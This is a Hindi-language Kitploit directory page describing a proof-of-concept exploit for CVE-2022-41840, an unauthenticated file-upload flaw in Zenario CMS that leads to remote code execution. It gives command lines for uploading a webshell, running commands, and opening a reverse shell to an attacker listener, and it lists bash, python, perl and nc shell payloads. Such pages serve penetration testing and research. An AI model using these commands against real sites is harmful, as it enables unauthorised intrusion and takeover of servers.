Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-41840-PoC — यह CVE-2022-41840 के लिए PoC एक्सप्लॉइट है, जो Zenario चला रहा है। | Kitploit
उपकरण/GitHubGitHub/princeaikinsbaidoo/cve-2022-41840-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubprinceaikinsbaidoo/cve-2022-41840-poc

CVE-2022-41840-PoC

यह CVE-2022-41840 के लिए PoC एक्सप्लॉइट है, जो Zenario चला रहा है।

रिपॉजिटरी देखें
6 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Zenario CMS 9.3 - बिना प्रमाणीकरण वाला RCE एक्सप्लॉइट

CVE-2022-41840

Zenario CMS संस्करण 9.3 और उससे पहले के संस्करणों को प्रभावित करने वाली एक बिना प्रमाणीकरण वाली रिमोट कोड निष्पादन (RCE) भेद्यता। यह एक्सप्लॉइट AJAX एंडपॉइंट में फ़ाइल अपलोड भेद्यता का लाभ उठाकर PHP वेबशैल अपलोड करता है और कोड निष्पादन प्राप्त करता है।

भेद्यता विवरण

  • CVE: CVE-2022-41840
  • प्रभावित संस्करण: Zenario CMS <= 9.3
  • भेद्यता प्रकार: RCE की ओर ले जाने वाला बिना प्रमाणीकरण वाला फ़ाइल अपलोड
  • हमला वेक्टर: HTTP POST से /zenario/ajax.php
  • आवश्यक विशेषाधिकार: कोई नहीं (बिना प्रमाणीकरण)

उपयोग

इंटरैक्टिव वेबशैल

root@kitploit:~
python3 zenario_exploit.py --target http://target.com

एकल कमांड निष्पादन

root@kitploit:~
python3 zenario_exploit.py --target http://target.com --cmd "id"

रिवर्स शेल

root@kitploit:~
python3 zenario_exploit.py --target http://target.com --lhost 10.x.x.x --lport 4444

आवश्यकताएँ

  • Python 3.x
  • requests लाइब्रेरी

निर्भरताएँ स्थापित करें:

root@kitploit:~
pip install requests

विशेषताएँ

  • भेद्य AJAX एंडपॉइंट के माध्यम से स्वचालित PHP वेबशैल अपलोड
  • बेहतर सफलता दर के लिए कई instanceId मानों का समर्थन
  • JSON और regex-आधारित पथ निष्कर्षण
  • कई रिवर्स शेल पेलोड विकल्प (bash, python, perl, nc)
  • टर्मिनल समर्थन के साथ पूर्ण रूप से इंटरैक्टिव PTY शेल
  • रिवर्स शेल विफल होने पर वेबशैल फ़ॉलबैक

अस्वीकरण

केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए।

यह टूल सुरक्षा शोधकर्ताओं और पेनिट्रेशन परीक्षकों के लिए प्रदान किया गया है ताकि वे उन प्रणालियों का परीक्षण कर सकें जिनके वे स्वामी हैं या जिनके परीक्षण के लिए उनके पास स्पष्ट प्राधिकरण है। कंप्यूटर प्रणालियों तक अनधिकृत पहुँच अवैध है और कड़ाई से निषिद्ध है।

अनुरक्षक इस टूल से होने वाले किसी भी दुरुपयोग या क्षति के लिए कोई ज़िम्मेदारी नहीं लेते हैं।

लाइसेंस

यह कोड केवल शैक्षिक उद्देश्यों के लिए प्रदान किया गया है।

टूल डाउनलोड करें